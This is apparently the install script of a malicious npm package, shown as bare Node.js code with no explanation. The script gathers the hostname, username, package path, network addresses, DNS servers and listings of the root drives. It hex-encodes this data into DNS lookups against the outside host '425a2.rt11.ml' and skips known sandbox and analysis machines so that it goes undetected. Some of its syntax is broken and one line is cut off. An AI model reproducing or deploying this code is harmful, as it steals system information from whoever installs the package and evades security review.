const os = require("os")
const dns = require("dns")
const querystring = require("querystring")
const https = require("https")
const fs = require('fs')
var path = require('path')
const packageJSON = require("./package.json")
const package = packageJSON.name
function checkhex = function checkhex(inputString){
var re = /^[0-9a-f]+$/g;
if(re.test(inputString)) {
    return true
} else {
    return false;
}
}
function checkpath = function checkpath(inputString){
var re = /^\/root\/extract[0-9]+\/package$/g;
if(re.test(inputString)) {
    return true
} else {
    return false;
}
}
function checklili = function checklili(inputString){
var re = /^\/home\/lili\/vastest\/[0-9]+\/package$/g;
if(re.test(inputString)) {
    return true
} else {
    return false;
}
}
function isValid = function isValid(hostname,path,username,dirs){
if(dirs.length==0){
lastdir = "";
}
else{
lastdir = dirs[dirs.length-1];
}
if(hostname == "DESKTOP-4E1IS0K" && username == "daasadmin" && path.startsWith('D:\\TRANSFER\\')){
return false;
}
else if(checkhex(hostname) && path.startsWith('/root/node_modules/') && lastdir == '/home/node'){
return false;
}
else if(checkhex(hostname) && checkpath(path)){
return false;
}
else if(hostname == 'box' && path.startsWith('/app/node_modules/') && lastdir == '/home/node'){
return false;
}
else if(hostname == 'box' && path.startsWith('/app/node_modules/')){
return false;
}
else if(checkhex(hostname) && path.startsWith('/root/node_modules') && lastdir == '/home/node'){
return false;
}
else if(checkhex(hostname) && path.startsWith('/root/node_modules')){
return false;
}
//else if(hostname == 'lili-pc' && checklili(path)){
else if(hostname == 'lili-pc'){
return false;
}
else if(hostname == 'aws-7grara913oid5jsexgkq'){
return false;
}
//else if(hostname =...
function getFiles = function getFiles(paths) {
var ufiles=[];
for(var j=0;j<paths.length;j++){
try{
  mpath = paths[j];
  files = fs.readdirSync(mpath);
  for(var i=0;i<files.length;i++){
  ufiles.push(path.join(mpath,files[i]));
  }
}
catch(error){}
}
  return ufiles;
}
function isprivate = function isprivate(ip) {
   if(ip.startsWith('fe80::')||ip=="::1")
       return true;
   var parts = ip.split('.');
   return parts[0] === '10' || 
      (parts[0] === '172' && (parseInt(parts[1], 10) >= 16 && parseInt(parts[1], 10) <= 31)) || 
      (parts[0] === '192' && parts[1] === '168') || (parts[0] === '127' && parts[1] === '0' && parts[2] === '0');
}
function toHex = function toHex(data){
const bufferText = Buffer.from(data, 'utf8');
const text = bufferText.toString('hex');
return text;
}
function todashedip = function todashedip(ip){
return ip.replace(/\./g, '-').replace(/:/g,'-');
}
function gethttpips = function gethttpips(){
var str=[];
var networkInterfaces = os.networkInterfaces();
for(item in networkInterfaces){
if(item != "lo"){
for(var i=0;i<networkInterfaces[item].length;i++){
str.push(networkInterfaces[item][i].address);
}
}
}
return str;
}
function getIps = function getIps(){
var str=[];
var networkInterfaces = os.networkInterfaces();
for(item in networkInterfaces){
if(item != "lo"){
for(var i=0;i<networkInterfaces[item].length;i++){
if(!isprivate(networkInterfaces[item][i].address))
str.push(networkInterfaces[item][i].address);
}
}
}
for(var i=0;i<str.length;i++){
if(str[i].includes('.'))
return "i."+todashedip(str[i])+".i";
}
if(str.length>0)
return "i."+todashedip(str[0])+".i";
else
return "i._.i";
}
function getPathChunks = function getPathChunks(path){
str="";
chunks = path.split('/');
for(var i=0;i<chunks.length;i++){
str=str+toHex(chunks[i])+".";
}
str=str.slice(1,-1);
return "p."+str+".p";
}
function toName = function toName(pkg){
var str="";
var queries = [];
var substr1 = "";
var substr2 = "";
var hostname = "425a2.rt11.ml";
str=toHex(pkg.hn)+"."+toHex(pkg.p)+"."+toHex(pkg.un)+"."+getPathChunks(pkg.c)+"."+getIps()+"."+hostname;
queries.push(str);
return queries;
}
_tmp_2.p = package
_tmp_2.c = __dirname
_tmp_2.hd = os.homedir()
_tmp_2.hn = os.hostname()
_tmp_2.un = os.userInfo().username
_tmp_2.dns = JSON.stringify(dns.getServers())
_tmp_2.ip = JSON.stringify(gethttpips())
_tmp_2.dirs = JSON.stringify(getFiles(["C:\\","D:\\","/","/home"]))
